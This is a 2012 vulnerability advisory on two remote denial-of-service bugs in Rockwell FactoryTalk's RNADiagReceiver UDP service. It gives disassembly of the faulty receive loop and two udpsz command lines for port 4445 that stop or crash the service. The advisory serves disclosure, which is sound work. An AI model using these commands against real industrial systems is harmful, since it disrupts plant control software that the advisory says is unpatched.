####################################################################### Luigi Auriemma Application: FactoryTalk RNADiagReceiver http://www.rockwellautomation.com/rockwellsoftware/factorytalk/ Versions: RNADiagReceiver <= 2.40.0.12 Platforms: Windows Bugs: A] RNADiagReceiver UDP silent Denial of Service B] RNADiagReceiver invalid memory access Exploitation: remote Date: 17 Jan 2012 (found 30 Sep 2011) Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's website: "With RSLogix 5000 programming software, you need only one software package for discrete, process, batch, motion, safety and drive-based application." RNADiagReceiver is a diagnostic component available in various Rockwell's products. ####################################################################### ======= 2) Bugs ======= ----------------------------------------------- A] RNADiagReceiver UDP silent Denial of Service ----------------------------------------------- The code of RNADiagReceiver that handles the UDP packets terminates when recvfrom() returns a value minor than zero. Through a packet bigger than 2000 bytes it's possible to stop the handling of these packets: 00402CCC |. 50 |PUSH EAX ; /pFromLen 00402CCD |. 8D45 00 |LEA EAX,DWORD PTR SS:[EBP] ; | 00402CD0 |. 50 |PUSH EAX ; |pFrom 00402CD1 |. 57 |PUSH EDI ; |Flags 00402CD2 |. 68 D0070000 |PUSH 7D0 ; |BufSize = 7D0 (2000.) 00402CD7 |. 8DB3 84000000 |LEA ESI,DWORD PTR DS:[EBX+84] ; | 00402CDD |. 56 |PUSH ESI ; |Buffer 00402CDE |. FFB3 80000000 |PUSH DWORD PTR DS:[EBX+80] ; |Socket 00402CE4 |. C745 DC 10000000 |MOV DWORD PTR SS:[EBP-24],10 ; | 00402CEB |. FF15 80324300 |CALL DWORD PTR DS:[<&WS2_32.#17>] ; \recvfrom 00402CF1 |. 83F8 01 |CMP EAX,1 00402CF4 |. 8945 EC |MOV DWORD PTR SS:[EBP-14],EAX 00402CF7 |.^0F8D DBFDFFFF \JGE RNADiagR.00402AD8 00402CFD |. FF15 64324300 CALL DWORD PTR DS:[<&WS2_32.#111>] ; [WSAGetLastError 00402D03 |. 50 PUSH EAX 00402D04 |. 68 FC344300 PUSH RNADiagR.004334FC ; UNICODE "Receive error" 00402D09 |. E8 E1E3FFFF CALL RNADiagR.004010EF 00402D0E |. 59 POP ECX 00402D0F |. 59 POP ECX 00402D10 |> 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 00402D13 |. 64:890D 00000000 MOV DWORD PTR FS:[0],ECX 00402D1A |. 59 POP ECX 00402D1B |. 5F POP EDI 00402D1C |. 5E POP ESI 00402D1D |. 5B POP EBX 00402D1E |. 8B8D 18020000 MOV ECX,DWORD PTR SS:[EBP+218] 00402D24 |. 33CD XOR ECX,EBP 00402D26 |. E8 D78D0000 CALL RNADiagR.0040BB02 00402D2B |. 81C5 1C020000 ADD EBP,21C 00402D31 |. C9 LEAVE 00402D32 \. C3 RETN ---------------------------------------- B] RNADiagReceiver invalid memory access ---------------------------------------- Each UDP packet is divided in chunks of informations where each one is composed by a 32bit number and a 16bit size. Through a big chunk size it's possible to crash the server due to an invalid memory access during the memcpy(). ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip A] udpsz SERVER 4445 2001 B] udpsz -C "0002 0001" 0 -C "00000000 ffff" 0x34 -b a SERVER 4445 2000 ####################################################################### ====== 4) Fix ====== No fix. #######################################################################